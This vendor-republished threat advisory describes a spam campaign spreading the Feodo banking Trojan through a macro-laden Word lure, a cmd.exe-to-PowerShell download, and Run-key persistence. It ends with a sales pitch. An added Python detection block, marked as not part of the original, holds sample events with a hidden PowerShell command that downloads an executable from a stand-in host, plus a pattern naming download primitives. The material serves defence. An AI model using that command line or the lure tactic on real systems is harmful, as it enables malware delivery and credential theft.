Active Spam Campaign is Spreading a Banking Trojan Known as “Feodo” – Here’s What to Look For – Startech Business Systems


The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.

Infection cycle:

The spam email purports to be from a bank, vendor or business supplier and typically carries a PDF or DOC attachment, as shown below.

The PDF file, for instance, contains a link inviting the recipient to download their invoice or statement.


Clicking the link downloads a Word document with embedded Visual Basic macros.

These macros launch a complex sequence of actions when the document is opened. Macros are disabled by default by the Trust Center security setting, and a security warning appears when a document containing macros is opened. To get around this, the body of the document instructs the victim to click "Enable Editing" and then "Enable Content" in order to view it.

[Figure: screenshot of the malicious document (spam_doc)]

Once the Visual Basic script executes, it spawns cmd.exe, which in turn launches PowerShell to download the banking Trojan.

[Figure: process spawn chain (spam_spawn)]

Below is an example of the commands cmd.exe and PowerShell executed to carry out this task:

[Figure: cmd.exe command line (spam_spawn)]

[Figure: PowerShell download command line (spam_powershell)]

PowerShell then executes the downloaded Feodo Trojan. The Trojan copies itself as "pagesrouted.exe" and registers itself in the registry to ensure persistence:

  • HKLM/Software/Microsoft/Windows/CurrentVersion/Run  pagesrouted   “%APPDATA%/Local/Wndows/pagesrouted.exe”
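The infection chain above (Office document, then cmd.exe, then a PowerShell download, then a Run-key entry under the user's AppData folder) is something a defender can hunt for in process-creation and registry telemetry. The following is an added example that is not part of the original article or of SonicWall's analysis; the event field names, the sample events and the registry entries are constructed for illustration.

```python
import re

# Constructed process-creation events shaped like the chain the article describes:
# Word -> cmd.exe -> powershell.exe (download) -> dropped executable. The field
# names (pid, ppid, image, cmdline) are assumptions for this example, not real logs.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": "WINWORD.EXE invoice.doc"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c powershell -w hidden -ep bypass ..."},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','C:\\Users\\u\\AppData\\Local\\Temp\\x.exe')"},
    {"pid": 103, "ppid": 102, "image": r"C:\Users\u\AppData\Local\Temp\x.exe", "cmdline": "x.exe"},
    # Benign chain: explorer.exe -> cmd.exe with no PowerShell download, must not be flagged.
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Common PowerShell download primitives; a real rule set would be broader.
DOWNLOAD_PATTERNS = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_macro_download_chains(events):
    """Return (office_pid, cmd_pid, powershell_pid) for each Office -> cmd.exe -> powershell.exe chain
    whose PowerShell command line carries a download indicator."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe" or not DOWNLOAD_PATTERNS.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        if not parent or basename(parent["image"]) != "cmd.exe":
            continue
        grand = by_pid.get(parent["ppid"])
        if grand and basename(grand["image"]) in OFFICE_APPS:
            hits.append((grand["pid"], parent["pid"], e["pid"]))
    return hits

RUN_KEY_PREFIX = "hklm\\software\\microsoft\\windows\\currentversion\\run"

def suspicious_run_values(registry_values):
    """Flag Run-key values (key, name, data) whose executable lives under AppData,
    the location the article's sample used for pagesrouted.exe."""
    flagged = []
    for key, name, data in registry_values:
        normalized = key.lower().replace("/", "\\")
        if normalized.startswith(RUN_KEY_PREFIX) and "appdata" in data.lower():
            flagged.append((name, data))
    return flagged
```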

During our analysis, the Trojan simply ran quietly in the background. Once we opened a browser and logged on to an online banking website, it contacted a known Feodo C&C server and sent encrypted data.

[Figure: C&C network traffic (spam_cc)]

During the past week, we have observed this threat spread throughout the United States, Germany, India and Brazil.

[Figure: geographic distribution of observed infections (spam_geo)]

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Feodo.S (Trojan)
  • GAV: Feodo.S _2 (Trojan)

Contact Startech today for information about our Social Engineering, Penetration Testing and other IT assessments and services!


